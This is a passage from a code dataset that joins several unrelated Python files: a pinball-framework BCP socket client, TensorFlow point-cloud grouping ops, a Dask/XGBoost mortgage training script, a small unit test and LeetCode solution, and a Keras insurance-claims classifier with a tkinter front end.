df\n\n\ndef aggregate_years(df: pd.DataFrame, method: str = 'mean'):\n    from datetime import datetime as dt\n    \"\"\"Aggregate years by method, e.g. max\"\"\"\n    df = df.groupby([df.index.month, df.index.day, df.index.hour]).agg(\n        { col: [method] for col in df.columns}\n    )\n    df.index = df.index.map( lambda m: dt(2016, m[0], m[1], m[2])) # 2016, because this is a leap year\n    df.columns = df.columns.droplevel(1)\n    return df\n\ndef filter_wet_days(datapoints, window: list, treshold: float):\n    \"\"\"\n    Removes datapoints that are considered to be from \"rainy\" days.\n    What is determined as a rainy day, depends on num_days and value.\n    \n    Args\n        dict_of_dfs: result from reader.get_data, i.e. 
dfs containing data from all\n stations\n num_days: # of preceding days to concider when summing precipitation\n values including current day\n treshold: max treshold value for the summed precipitation level\n \"\"\"\n num_hours = 100 - window[0]\n current_values = [0] * num_hours # to store precipitation vals\n lag = 100 - window[1]\n \n def check_and_update(value):\n # FIFO - keeps length the same\n current_values.pop(0)\n current_values.append(value)\n # In case lag is 0 -> must use len\n return sum(current_values[:len(current_values) - lag]) < treshold\n \n for dp in datapoints:\n if 'florida_sentrum' in dp:\n val = dp['florida_sentrum']['precipitation (mm)']\n elif 'florida_uib' in dp:\n val = dp['florida_uib']['precipitation (mm)']\n else:\n val = 0 # whats the deffault?\n #print(f'no precipitation data for datapoint from {dp[\"date\"]}')\n if check_and_update(val):\n yield dp","repo_name":"scottgullaksen/bergenvann-summer-project","sub_path":"project/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42115506459","text":"\"\"\"BCP socket client.\"\"\"\nimport json\nfrom urllib.parse import urlsplit, parse_qs, quote, unquote, urlunparse\n\nimport asyncio\n\nfrom typing import Tuple\n\nfrom mpf._version import __version__, __bcp_version__\nfrom mpf.core.bcp.bcp_client import BaseBcpClient\n\nBYTE_MARKER = b'&bytes='\n\n\nclass MpfJSONEncoder(json.JSONEncoder):\n\n \"\"\"Encoder which by default encodes to string.\"\"\"\n\n # pylint: disable-msg=method-hidden\n def default(self, o):\n \"\"\"Encode to string.\"\"\"\n return str(o)\n\n\ndef decode_command_string(bcp_string) -> Tuple[str, dict]:\n \"\"\"Decode a BCP command string into separate command and parameter parts.\n\n Args:\n ----\n bcp_string: The incoming UTF-8, URL encoded BCP command string.\n\n Returns a tuple of the command string and a dictionary of kwarg pairs.\n\n Example:\n -------\n Input: trigger?name=hello&foo=Foo%20Bar\n Output: ('trigger', {'name': 'hello', 'foo': 'Foo Bar'})\n\n Note that BCP commands and parameter names are not case-sensitive and will\n be converted to lowercase. 
Parameter values are case sensitive, and case\n will be preserved.\n\n \"\"\"\n bcp_command = urlsplit(bcp_string, allow_fragments=False)\n\n if bcp_command.query[0:5] == \"json=\":\n kwargs = json.loads(bcp_command.query[5:])\n return bcp_command.path, kwargs\n\n try:\n kwargs = parse_qs(bcp_command.query, keep_blank_values=True)\n except AttributeError:\n kwargs = dict()\n\n for k, v in kwargs.items():\n if isinstance(v[0], str):\n if v[0].startswith('int:'):\n v[0] = int(v[0][4:])\n elif v[0].startswith('float:'):\n v[0] = float(v[0][6:])\n elif v[0].lower() == 'bool:true':\n v[0] = True\n elif v[0].lower() == 'bool:false':\n v[0] = False\n elif v[0] == 'NoneType:':\n v[0] = None\n else:\n v[0] = unquote(v[0])\n\n kwargs[k] = v\n\n return (bcp_command.path,\n dict((k, v[0]) for k, v in kwargs.items()))\n\n\ndef encode_command_string(bcp_command, **kwargs) -> str:\n \"\"\"Encode a BCP command and kwargs into a valid BCP command string.\n\n Args:\n ----\n bcp_command: String of the BCP command name.\n **kwargs: Optional pair(s) of kwargs which will be appended to the\n command.\n\n Returns a string.\n\n Example:\n -------\n Input: encode_command_string('trigger', {'name': 'hello', 'foo': 'Bar'})\n Output: trigger?name=hello&foo=Bar\n\n Note that BCP commands and parameter names are not case-sensitive and will\n be converted to lowercase. Parameter values are case sensitive, and case\n will be preserved.\n\n \"\"\"\n kwarg_string = ''\n json_needed = False\n\n for k, v in kwargs.items():\n if isinstance(v, (dict, list)):\n json_needed = True\n break\n\n value = quote(str(v), '')\n\n if isinstance(v, bool): # bool isinstance of int, so this goes first\n value = 'bool:{}'.format(value)\n elif isinstance(v, int):\n value = 'int:{}'.format(value)\n elif isinstance(v, float):\n value = 'float:{}'.format(value)\n elif v is None:\n value = 'NoneType:'\n else: # cast anything else as a string\n value = str(value)\n\n kwarg_string += '{}={}&'.format(quote(k, ''),\n value)\n\n kwarg_string = kwarg_string[:-1]\n\n if json_needed:\n kwarg_string = 'json={}'.format(json.dumps(kwargs, cls=MpfJSONEncoder))\n\n return str(urlunparse(('', '', bcp_command, '', kwarg_string, '')))\n\n\nclass AsyncioBcpClientSocket():\n\n \"\"\"Simple asyncio bcp client.\"\"\"\n\n def __init__(self, sender, receiver):\n \"\"\"initialize BCP client socket.\"\"\"\n self._sender = sender\n self._receiver = receiver\n self._receive_buffer = b''\n\n # pylint: disable-msg=inconsistent-return-statements\n async def read_message(self):\n \"\"\"Read the next message.\"\"\"\n while True:\n message = await self._receiver.readline()\n\n # handle EOF\n if not message:\n raise BrokenPipeError()\n\n # strip newline\n message = message[0:-1]\n\n if BYTE_MARKER in message:\n message, bytes_needed = message.split(BYTE_MARKER)\n bytes_needed = int(bytes_needed)\n\n raw_bytes = await self._receiver.readexactly(bytes_needed)\n\n message_obj = self._process_command(message, raw_bytes)\n\n else: # no bytes in the message\n message_obj = self._process_command(message)\n\n if message_obj:\n return message_obj\n\n def send(self, bcp_command, kwargs):\n \"\"\"Send a message to the BCP host.\n\n Args:\n ----\n bcp_command: command to send\n kwargs: parameters to command\n \"\"\"\n bcp_string = encode_command_string(bcp_command, **kwargs)\n self._sender.write((bcp_string + '\\n').encode())\n\n async def wait_for_response(self, bcp_command):\n \"\"\"Wait for a command and ignore all others.\"\"\"\n while True:\n cmd, args = await self.read_message()\n if 
cmd == \"reset\":\n self.send(\"reset_complete\", {})\n continue\n if cmd == bcp_command:\n return cmd, args\n\n @staticmethod\n def _process_command(message, rawbytes=None):\n cmd, kwargs = decode_command_string(message.decode())\n if rawbytes:\n kwargs['rawbytes'] = rawbytes\n\n return cmd, kwargs\n\n\nclass BCPClientSocket(BaseBcpClient):\n\n \"\"\"MPF version of the AsyncioBcpClientSocket.\n\n (There can be multiple of these to connect to multiple BCP media controllers simultaneously.)\n\n Args:\n ----\n machine: The main MachineController object.\n name: String name this client.\n bcp: The bcp object.\n \"\"\"\n\n config_name = 'bcp_client'\n\n __slots__ = [\"_sender\", \"_receiver\", \"_send_goodbye\", \"_receive_buffer\", \"_bcp_client_socket_commands\", \"__dict__\"]\n\n def __init__(self, machine, name, bcp):\n \"\"\"initialize BCP client socket.\"\"\"\n super().__init__(machine, name, bcp)\n\n self._sender = None\n self._receiver = None\n self._send_goodbye = True\n self._receive_buffer = b''\n\n self._bcp_client_socket_commands = {'hello': self._receive_hello,\n 'goodbye': self._receive_goodbye}\n\n def __repr__(self):\n \"\"\"Return str representation.\"\"\"\n return 'BCPClientSocket.{}'.format(self.name)\n\n async def connect(self, config):\n \"\"\"Actively connect to server.\"\"\"\n return await self._setup_client_socket(config['host'], config['port'], config.get('required'))\n\n async def _setup_client_socket(self, client_host, client_port, required=True):\n \"\"\"Set up the client socket.\"\"\"\n self.info_log(\"Connecting BCP to '%s' at %s:%s...\",\n self.name, client_host, client_port)\n\n while True:\n connector = self.machine.clock.open_connection(client_host, client_port)\n try:\n self._receiver, self._sender = await connector\n except OSError:\n if required:\n await asyncio.sleep(.1)\n continue\n\n self.info_log(\"No BCP connection made to '%s' %s:%s\",\n self.name, client_host, client_port)\n return False\n\n break\n\n self.info_log(\"Connected BCP to '%s' %s:%s\", self.name, client_host, client_port)\n\n self.send_hello()\n return True\n\n def accept_connection(self, receiver, sender):\n \"\"\"Create client for incoming connection.\"\"\"\n self._receiver = receiver\n self._sender = sender\n\n self.send_hello()\n\n def stop(self):\n \"\"\"Stop and shut down the socket client.\"\"\"\n self.debug_log(\"Stopping socket client\")\n\n if self._send_goodbye:\n self.send_goodbye()\n\n self._sender.close()\n\n def send(self, bcp_command, kwargs):\n \"\"\"Send a message to the BCP host.\n\n Args:\n ----\n bcp_command: command to send\n kwargs: parameters to command\n \"\"\"\n try:\n bcp_string = encode_command_string(bcp_command, **kwargs)\n # pylint: disable-msg=broad-except\n except Exception as e:\n self.warning_log(\"Failed to encode bcp_command %s with args %s. %s\", bcp_command, kwargs, e)\n return\n\n if self._debug:\n self.debug_log('Sending \"%s\"', bcp_string)\n\n if hasattr(self._sender.transport, \"is_closing\") and self._sender.transport.is_closing():\n self.warning_log(\"Failed to write to bcp since transport is closing. 
Transport %s\", self._sender.transport)\n return\n self._sender.write((bcp_string + '\\n').encode())\n\n # pylint: disable-msg=inconsistent-return-statements\n async def read_message(self):\n \"\"\"Read the next message.\"\"\"\n while True:\n message = await self._receiver.readline()\n\n # handle EOF\n if not message:\n raise BrokenPipeError()\n\n # strip newline\n message = message[0:-1]\n\n if BYTE_MARKER in message:\n message, bytes_needed = message.split(b'&bytes=')\n bytes_needed = int(bytes_needed)\n\n rawbytes = await self._receiver.readexactly(bytes_needed)\n\n message_obj = self._process_command(message, rawbytes)\n\n else: # no bytes in the message\n message_obj = self._process_command(message)\n\n if message_obj:\n return message_obj\n\n def _process_command(self, message, rawbytes=None):\n if self._debug:\n self.debug_log('Received \"%s\"', message)\n\n cmd, kwargs = decode_command_string(message.decode())\n if rawbytes:\n kwargs['rawbytes'] = rawbytes\n\n if cmd in self._bcp_client_socket_commands:\n self._bcp_client_socket_commands[cmd](**kwargs)\n return None\n\n return cmd, kwargs\n\n def _receive_hello(self, **kwargs):\n \"\"\"Process incoming BCP 'hello' command.\"\"\"\n self.debug_log('Received BCP Hello from host with kwargs: %s', kwargs)\n\n def _receive_goodbye(self):\n \"\"\"Process incoming BCP 'goodbye' command.\"\"\"\n self._send_goodbye = False\n self.stop()\n\n def send_hello(self):\n \"\"\"Send BCP 'hello' command.\"\"\"\n self.send('hello', {\"version\": __bcp_version__,\n \"controller_name\": 'Mission Pinball Framework',\n \"controller_version\": __version__})\n\n def send_goodbye(self):\n \"\"\"Send BCP 'goodbye' command.\"\"\"\n self.send('goodbye', {})\n","repo_name":"missionpinball/mpf","sub_path":"mpf/core/bcp/bcp_socket_client.py","file_name":"bcp_socket_client.py","file_ext":"py","file_size_in_byte":10959,"program_lang":"python","lang":"en","doc_type":"code","stars":192,"dataset":"github-code","pt":"19"} +{"seq_id":"31751805332","text":"import os\nimport sys\n\nimport tensorflow as tf\nfrom tensorflow.python.framework import ops\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(BASE_DIR)\ngrouping_module = tf.load_op_library(os.path.join(BASE_DIR, \"tf_grouping_so.so\"))\n\n\ndef query_ball_point(\n radius: float, k: int, xyz1: tf.Tensor, xyz2: tf.Tensor\n) -> (tf.Tensor, tf.Tensor):\n \"\"\"Return k points within a ball region of radius around the query points.\n\n Arguments:\n radius : float\n The ball region search radius.\n k : int\n The number of points selected in each ball region.\n xyz1 : tf.Tensor(shape=(batch_size, P1, 3), dtype=tf.float32)\n The input points with P1 number of points given in xyz.\n xyz2 : tf.Tensor(shape=(batch_size, P2, 3), dtype=tf.float32)\n The query points with P2 number of points given in xyz.\n\n Returns:\n indices : tf.Tensor(shape=(batch_size, P2, k), dtype=tf.int32)\n The indices of the k ball region points in the input points.\n unique_point_count : tf.Tensor(shape=(batch_size, k), dtype=tf.int32)\n The number of unique points in each local region.\n \"\"\"\n return grouping_module.query_ball_point(xyz1, xyz2, radius, k)\n\n\nops.NoGradient(\"QueryBallPoint\")\n\n\ndef select_top_k(k: int, data: tf.Tensor) -> (tf.Tensor, tf.Tensor):\n \"\"\"Returns the indices and elements of the k smallest elements of data.\n\n Arguments:\n k : int\n The number of the k SMALLEST elements selected.\n data : tf.Tensor(shape=(batch_size, m, n), dtype=tf.float32)\n A distance matrix with m query points and n 
dataset points.\n\n Returns:\n indices : tf.Tensor(shape=(batch_size, m, n), dtype=tf.int32)\n The first k in n are the indices to the top k.\n distances : tf.Tensor(shape=(batch_size, m, n), dtype=tf.float32)\n The first k in n are the distances of the top k.\n \"\"\"\n\n return grouping_module.selection_sort(data, k)\n\n\nops.NoGradient(\"SelectionSort\")\n\n\ndef group_point(data: tf.Tensor, indices: tf.Tensor) -> tf.Tensor:\n \"\"\"Group points according to indices.\n\n Arguments:\n data : tf.Tensor(shape=(batch_size, P1, channels), dtype=tf.float32)\n The data to sample from with P1 number of points.\n indices : tf.Tensor(shape=(batch_size, P2, k), dtype=tf.int32)\n The indices to the points with P2 query positions and k entries.\n\n Returns:\n group : tf.Tensor(shape=(batch_size, P2, k, channels), dtype=tf.float32)\n The values sampled from points with indices.\n\n \"\"\"\n\n return grouping_module.group_point(data, indices)\n\n\n@tf.RegisterGradient(\"GroupPoint\")\ndef _group_point_grad(op, grad_out):\n points = op.inputs[0]\n idx = op.inputs[1]\n return [grouping_module.group_point_grad(points, idx, grad_out), None]\n\n\ndef knn_point(k: int, xyz1: tf.Tensor, xyz2: tf.Tensor) -> (tf.Tensor, tf.Tensor):\n \"\"\"Compute the distances and indices of the k nearest neighbors.\n\n Arguments:\n k : int\n The number of neighbors to return in KNN search.\n xyz1 : tf.Tensor(shape=(batch_size, P1, channels), dtype=tf.float32)\n The input points with P1 number of points and channels given in xyz.\n xyz2 : tf.Tensor(shape=(batch_size, P2, channels), dtype=tf.float32)\n The query points with P2 number of points and channels given in xyz.\n\n Returns:\n indices : tf.Tensor(shape=(batch_size, P2, k), dtype=tf.int32)\n The indices of of the k nearest neighbors in the input points.\n distances : tf.Tensor(shape=(batch_size, P2, k), dtype=tf.float32)\n The L2 distances of the k nearest neighbors.\n \"\"\"\n # Internal broadcast to (batch_size, num_points_2, num_points_1, channels).\n xyz1 = xyz1[:, tf.newaxis, :, :]\n xyz2 = xyz2[:, :, tf.newaxis, :]\n\n # Compute the L2 distances.\n distances = tf.reduce_sum((xyz1 - xyz2) ** 2, axis=-1)\n\n # Use select_to_k with GPU support (tf.nn.top_k only has CPU support).\n indices, distances = select_top_k(k, distances)\n indices = indices[..., :k]\n distances = distances[..., :k]\n\n return indices, distances\n","repo_name":"ltriess/pointnet2_keras","sub_path":"pointnet2/tf_ops/grouping/tf_grouping.py","file_name":"tf_grouping.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"75060149484","text":"'''\n'''\nimport os\n\ntry:\n # Disable NCCL P2P. 
Only necessary for versions of NCCL < 2.4\n # https://rapidsai.github.io/projects/cudf/en/0.8.0/dask-xgb-10min.html#Disable-NCCL-P2P.-Only-necessary-for-versions-of-NCCL-%3C-2.4\n os.environ[\"NCCL_P2P_DISABLE\"] = \"1\"\nexcept Exception:\n pass\n\nimport json\n\nfrom dask_cuda import LocalCUDACluster\nfrom dask.distributed import Client\n# from distributed import Client\n\nfrom mortgage_common import (\n mortgage_etl_workflow_def, generate_mortgage_greenflow_run_params_list,\n MortgageTaskNames)\n\n\ndef main():\n\n memory_limit = 128e9\n threads_per_worker = 4\n cluster = LocalCUDACluster(\n memory_limit=memory_limit,\n threads_per_worker=threads_per_worker)\n client = Client(cluster)\n sched_info = client.scheduler_info()\n\n print('CLIENT: {}'.format(client))\n print('SCHEDULER INFO:\\n{}'.format(json.dumps(sched_info, indent=2)))\n\n # Importing here in case RMM is used later on. Must start client prior\n # to importing cudf stuff if using RMM.\n from greenflow.dataframe_flow import (TaskSpecSchema, TaskGraph)\n\n # workers_names = \\\n # [iw['name'] for iw in client.scheduler_info()['workers'].values()]\n # nworkers = len(workers_names)\n\n _basedir = os.path.dirname(__file__)\n # mortgage_data_path = '/datasets/rapids_data/mortgage'\n mortgage_data_path = os.path.join(_basedir, 'mortgage_data')\n\n # Using some default csv files for testing.\n # csvfile_names = os.path.join(mortgage_data_path, 'names.csv')\n # acq_data_path = os.path.join(mortgage_data_path, 'acq')\n # perf_data_path = os.path.join(mortgage_data_path, 'perf')\n # csvfile_acqdata = os.path.join(acq_data_path, 'Acquisition_2000Q1.txt')\n # csvfile_perfdata = \\\n # os.path.join(perf_data_path, 'Performance_2000Q1.txt_0')\n # mortgage_etl_workflow_def(\n # csvfile_names, csvfile_acqdata, csvfile_perfdata)\n\n greenflow_task_spec_list = mortgage_etl_workflow_def()\n\n start_year = 2000\n end_year = 2001 # end_year is inclusive\n # end_year = 2016 # end_year is inclusive\n # part_count = 16 # the number of data files to train against\n\n # create_dmatrix_serially - When False on same node if not enough host RAM\n # then it's a race condition when creating the dmatrix. Make sure enough\n # host RAM otherwise set to True.\n # create_dmatrix_serially = False\n\n # able to do 18 with create_dmatrix_serially set to True\n part_count = 18 # the number of data files to train against\n create_dmatrix_serially = True\n # part_count = 4 # the number of data files to train against\n\n # Use RAPIDS Memory Manager. 
Seems to work fine without it.\n use_rmm = False\n\n # Clean up intermediate dataframes in the xgboost training task.\n delete_dataframes = True\n\n mortgage_run_params_dict_list = generate_mortgage_greenflow_run_params_list(\n mortgage_data_path, start_year, end_year, part_count,\n greenflow_task_spec_list)\n\n _basedir = os.path.dirname(__file__)\n mortgage_lib_module = os.path.join(_basedir, 'mortgage_greenflow_plugins.py')\n\n filter_dask_logger = False\n\n mortgage_workflow_runner_task = {\n TaskSpecSchema.task_id:\n MortgageTaskNames.dask_mortgage_workflow_runner_task_name,\n TaskSpecSchema.node_type: 'DaskMortgageWorkflowRunner',\n TaskSpecSchema.conf: {\n 'mortgage_run_params_dict_list': mortgage_run_params_dict_list,\n 'client': client,\n 'use_rmm': use_rmm,\n 'filter_dask_logger': filter_dask_logger,\n },\n TaskSpecSchema.inputs: [],\n TaskSpecSchema.filepath: mortgage_lib_module\n }\n\n dxgb_gpu_params = {\n 'nround': 100,\n 'max_depth': 8,\n 'max_leaves': 2 ** 8,\n 'alpha': 0.9,\n 'eta': 0.1,\n 'gamma': 0.1,\n 'learning_rate': 0.1,\n 'subsample': 1,\n 'reg_lambda': 1,\n 'scale_pos_weight': 2,\n 'min_child_weight': 30,\n 'tree_method': 'gpu_hist',\n 'n_gpus': 1,\n 'distributed_dask': True,\n 'loss': 'ls',\n # 'objective': 'gpu:reg:linear',\n 'objective': 'reg:squarederror',\n 'max_features': 'auto',\n 'criterion': 'friedman_mse',\n 'grow_policy': 'lossguide',\n 'verbose': True\n }\n\n dxgb_trainer_task = {\n TaskSpecSchema.task_id: MortgageTaskNames.dask_xgb_trainer_task_name,\n TaskSpecSchema.node_type: 'DaskXgbMortgageTrainer',\n TaskSpecSchema.conf: {\n 'create_dmatrix_serially': create_dmatrix_serially,\n 'delete_dataframes': delete_dataframes,\n 'dxgb_gpu_params': dxgb_gpu_params,\n 'client': client,\n 'filter_dask_logger': filter_dask_logger\n },\n TaskSpecSchema.inputs: [\n MortgageTaskNames.dask_mortgage_workflow_runner_task_name\n ],\n TaskSpecSchema.filepath: mortgage_lib_module\n }\n\n task_spec_list = [mortgage_workflow_runner_task, dxgb_trainer_task]\n\n out_list = [MortgageTaskNames.dask_xgb_trainer_task_name]\n task_graph = TaskGraph(task_spec_list)\n (bst,) = task_graph.run(out_list)\n\n print('XGBOOST BOOSTER:\\n', bst)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"NVIDIA/fsi-samples","sub_path":"gQuant/plugins/gquant_plugin/notebooks/mortgage_e2e_gquant/mortgage_run_workflow_daskdistrib.py","file_name":"mortgage_run_workflow_daskdistrib.py","file_ext":"py","file_size_in_byte":5229,"program_lang":"python","lang":"en","doc_type":"code","stars":263,"dataset":"github-code","pt":"19"} +{"seq_id":"42108469419","text":"import pytest\n\nfrom yandextank.common.interfaces import TankInfo\n\n\nclass TestStatus(object):\n\n @pytest.mark.parametrize('updates, result', [\n ([(['plugin', 'key1'], 'foo'), (['plugin', 'key2'], 42)], {'plugin': {'key1': 'foo', 'key2': 42}}),\n ([(['plugin1', 'key1'], 'foo'),\n (['plugin1', 'key2'], 42),\n (['plugin2', 'key1'], 'bar')], {'plugin1': {'key1': 'foo', 'key2': 42},\n 'plugin2': {'key1': 'bar'}})\n ])\n def test_update(self, updates, result):\n info = TankInfo(dict())\n for args in updates:\n info.update(*args)\n assert info.get_info_dict() == result\n","repo_name":"yandex/yandex-tank","sub_path":"yandextank/common/tests/test_interfaces.py","file_name":"test_interfaces.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":2344,"dataset":"github-code","pt":"19"} +{"seq_id":"4282144107","text":"\"\"\"\n 5372 逐步求和得到正数的最小值\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n 
def minStartValue(self, nums: List[int]) -> int:\n min_r = 0\n r = 0\n for n in nums:\n r += n\n if r < min_r:\n min_r = r\n\n if min_r > 0:\n return 1\n else:\n return -min_r + 1\n\n\nif __name__ == '__main__':\n s = Solution()\n\n num = [1, 2]\n print(s.minStartValue(num))\n","repo_name":"MerleLiuKun/GoGoGo","sub_path":"ikaros/week-24-double/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"35536382641","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport keras \nimport numpy as np\nfrom keras.preprocessing.text import Tokenizer\nimport numpy as np\nimport pandas as pd\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.layers import Input, Dense, Dropout, Embedding, LSTM, Flatten\nfrom keras.models import Model\nfrom keras.utils import to_categorical\nfrom keras.callbacks import ModelCheckpoint\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\n\n\n# In[2]:\n\nfrom keras.layers import Dropout,Concatenate,merge,BatchNormalization\n\n\n# In[3]:\n\nfrom keras.optimizers import SGD\n\n\n# In[4]:\n\nfrom keras.layers.merge import concatenate\nfrom keras.metrics import categorical_accuracy\n\n\n# In[5]:\n\ndata=pd.read_csv(\"/Users/Mainaki Saraf/Desktop/clustering/clusters.csv\",encoding=\"ISO-8859-1\",low_memory=False)\n\n\n# In[6]:\n\ndata['target'] = data.CLUSTER.astype('category').cat.codes\n\n\n# In[7]:\n\nnum_class = len(np.unique(data.CLUSTER.values))\ny = data['target'].values\n\n\n# In[8]:\n\nMAX_LENGTH = 100\ntokenizer = Tokenizer(split='\\n')\ntokenizer.fit_on_texts(data.STATE.values)\npost_seq = tokenizer.texts_to_sequences(data.STATE.values)\ndata[\"STATE\"]=pad_sequences(post_seq, maxlen=MAX_LENGTH)\n\n\n# In[9]:\n\nMAX_LENGTH = 100\ntokenizer2 = Tokenizer(split='\\n')\ntokenizer2.fit_on_texts(data.COVERAGE.values)\npost_seq2 = tokenizer2.texts_to_sequences(data.COVERAGE.values)\ndata[\"COVERAGE\"]=pad_sequences(post_seq2, maxlen=MAX_LENGTH)\n\n\n# In[10]:\n\nMAX_LENGTH = 100\ntokenizer3 = Tokenizer(split='\\n')\ntokenizer3.fit_on_texts(data.IPOLNO.values)\npost_seq3 = tokenizer3.texts_to_sequences(data.IPOLNO.values)\ndata[\"IPOLNO\"]=pad_sequences(post_seq3, maxlen=MAX_LENGTH)\n\n\n# In[11]:\n\nMAX_LENGTH = 100\ntokenizer4 = Tokenizer(split='\\n')\ntokenizer4.fit_on_texts(data.OCCURRENCE.values)\npost_seq4 = tokenizer4.texts_to_sequences(data.OCCURRENCE.values)\ndata[\"OCCURRENCE\"] = pad_sequences(post_seq4, maxlen=MAX_LENGTH)\n\n\n# In[12]:\n\nx_data=np.array(data.drop([\"CLUSTER\",\"target\",\"DRIVERAGE\",\"YORKPAID\",\"VEHAGE\"],axis=1))\n#x_num=np.array(data[\"DRIVERAGE\"])\nx_num=np.array(data.drop([\"STATE\",\"COVERAGE\",\"CLUSTER\",\"target\",\"OCCURRENCE\",\"IPOLNO\"],axis=1))\n\n\n# In[13]:\n\nx_data=np.array_split(x_data,15)\nx_num=np.array_split(x_num,15)\ny=np.array_split(y,15)\n\n\n# In[14]:\n\nlen(y[0])\n\n\n# In[15]:\n\n#input 1- categorical features as input\nvisible1 = Input(shape=(4,))\nembedding_layer = Embedding(4,128,input_length=4)(visible1)\nv1 = Flatten()(embedding_layer)\n\n\n# In[16]:\n\n#input 2 - numerical features as input\n#visible2 = Input(shape=(1,))\n#visible2 = Input(shape=(2,))\nvisible2 = Input(shape=(3,))\n\n\n# In[17]:\n\nmerge = concatenate([v1, visible2])\n\n\n# In[18]:\n\nx= 
Dense(7,activation='relu')(merge)\nx=BatchNormalization()(x)\nx= Dense(25,activation='relu')(x)\nx= Dense(20,activation='relu')(x)\nx=Dropout(0.05)(x)\nx= Dense(15,activation='relu')(x)\nx = Dense(10, activation='relu')(x)\nx = Dense(5, activation='relu')(x)\n\npredictions = Dense(num_class, activation='softmax')(x)\n\n\n# In[19]:\n\nmodel = Model(inputs=[visible1,visible2], outputs=predictions)\n\n\n# In[20]:\n\nmodel.compile(optimizer='adam',loss='categorical_crossentropy',metrics=['acc'])\n#model.compile(optimizer='adam',loss='binary_crossentropy',metrics=[categorical_accuracy])\n#model.compile(optimizer='adam',loss='binary_crossentropy',metrics=['mse'])\n\n\n# In[21]:\n\nmodel.summary()\n\n\n# In[29]:\n\nfilepath=\"weights-simple56.hdf5\"\ncheckpointer = ModelCheckpoint(filepath, monitor='val_acc', verbose=1, save_best_only=True, mode='max')\n\n\n# In[30]:\n\nfor i in range(5,10):\n X_train, X_test, y_train, y_test = train_test_split(x_data[i], y[i], test_size=0.05,random_state=42)\n X_train1, X_test1, y_train1, y_test1= train_test_split(x_num[i], y[i], test_size=0.05,random_state=42)\n history = model.fit([X_train,X_train1], batch_size=64, y=to_categorical(y_train), verbose=1, validation_split=0.15, shuffle=True, epochs=70, callbacks=[checkpointer])\n\n\n# In[371]:\n\n#filepath=\"weights-simple16.hdf5\"\n\n\n# In[372]:\n\n#checkpointer = ModelCheckpoint(filepath, monitor='val_acc', verbose=1, save_best_only=True, mode='max')\n\n\n# In[373]:\n\n#X_train, X_test, y_train, y_test = train_test_split(x_data, y, test_size=0.05)\n#X_train1, X_test1, y_train1, y_test1= train_test_split(x_num, y, test_size=0.05)\n\n\n# In[374]:\n\n#history = model.fit([X_train,X_train1], batch_size=64, y=to_categorical(y_train), verbose=1, validation_split=0.15, shuffle=True, epochs=70, callbacks=[checkpointer])\n\n\n# In[31]:\n\ndf = pd.DataFrame({'epochs':history.epoch, 'accuracy': history.history['acc'], 'validation_accuracy': history.history['val_acc']})\ng = sns.pointplot(x=\"epochs\", y=\"accuracy\", data=df, fit_reg=False)\ng = sns.pointplot(x=\"epochs\", y=\"validation_accuracy\", data=df, fit_reg=False, color='green')\n\n\n# In[32]:\n\nplt.show()\n\n\n# In[33]:\n\nfrom tkinter import *\n\n\n# In[34]:\n\ndef pred(string):\n test=pd.read_csv(string,encoding=\"ISO-8859-1\",low_memory=False)\n \n MAX_LENGTH = 100\n state=list(test.STATE)\n tokenizer = Tokenizer(split='\\n')\n tokenizer.fit_on_texts(test.STATE.values)\n post_seq = tokenizer.texts_to_sequences(test.STATE.values)\n test[\"STATE\"]=pad_sequences(post_seq, maxlen=MAX_LENGTH)\n \n MAX_LENGTH = 100\n cov=list(test.COVERAGE)\n tokenizer2 = Tokenizer(split='\\n')\n tokenizer2.fit_on_texts(test.COVERAGE.values)\n post_seq2 = tokenizer2.texts_to_sequences(test.COVERAGE.values)\n test[\"COVERAGE\"]=pad_sequences(post_seq2, maxlen=MAX_LENGTH)\n \n MAX_LENGTH = 100\n ipolno=list(test.IPOLNO)\n tokenizer3 = Tokenizer(split='\\n')\n tokenizer3.fit_on_texts(test.IPOLNO.values)\n post_seq3 = tokenizer3.texts_to_sequences(test.IPOLNO.values)\n test[\"IPOLNO\"]=pad_sequences(post_seq3, maxlen=MAX_LENGTH)\n \n MAX_LENGTH = 100\n occ=list(test.OCCURRENCE)\n tokenizer4 = Tokenizer(split='\\n')\n tokenizer4.fit_on_texts(test.OCCURRENCE.values)\n post_seq4 = tokenizer4.texts_to_sequences(test.OCCURRENCE.values)\n test[\"OCCURRENCE\"] = pad_sequences(post_seq4, maxlen=MAX_LENGTH)\n \n x_data1=np.array(test.drop([\"DRIVERAGE\",\"YORKPAID\",\"VEHAGE\",\"PCLUSTER\"],axis=1))\n #x_num=np.array(data[\"DRIVERAGE\"])\n 
x_num1=np.array(test.drop([\"STATE\",\"COVERAGE\",\"OCCURRENCE\",\"IPOLNO\",\"PCLUSTER\"],axis=1))\n \n a={0:'A',1:'B',2:'C',3:'D'}\n \n yp=model.predict([x_data1,x_num1])\n \n print(yp)\n \n y_classes = yp.argmax(axis=-1)\n \n print(y_classes)\n \n for i in range(len(y_classes)):\n test[\"STATE\"][i]=state[i]\n test[\"COVERAGE\"][i]=cov[i]\n test[\"IPOLNO\"][i]=ipolno[i]\n test[\"OCCURRENCE\"][i]=occ[i]\n #print(y_classes[i],a[y_classes[i]])\n test[\"PCLUSTER\"][i]=a[y_classes[i]]\n \n pd.set_option('display.expand_frame_repr', False) \n \n print(test)\n \n return test\n\n\n# In[35]:\n\ndef printtext():\n global entry_1\n global string\n string = entry_1.get() \n accept=pred(string)\n text.insert(INSERT, accept)\n\nfrom tkinter import *\nroot = Tk()\nroot.title('Claims Prediction')\ntext = Text(root)\nlabel_1=Label(root,text=\"Enter File Path\")\nentry_1=Entry(root)\nlabel_1.pack()\nentry_1.pack()\nentry_1.focus_set()\nb = 